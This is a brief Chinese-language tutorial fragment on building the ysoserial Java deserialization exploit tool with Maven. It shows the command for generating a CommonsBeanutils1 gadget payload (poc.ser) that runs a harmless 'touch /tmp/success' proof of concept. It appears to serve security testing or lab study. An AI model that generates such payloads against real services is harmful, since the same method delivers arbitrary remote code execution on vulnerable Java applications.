下载使用反序列化利用工具ysoserial
项目地址:https://github.com/frohoff/ysoserial
适用maven在命令行下打包:
mvn clean package -D skipTests(在项目目录下执行)
使用ysoserial生成CommonsBeanutils1的Gadget:
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser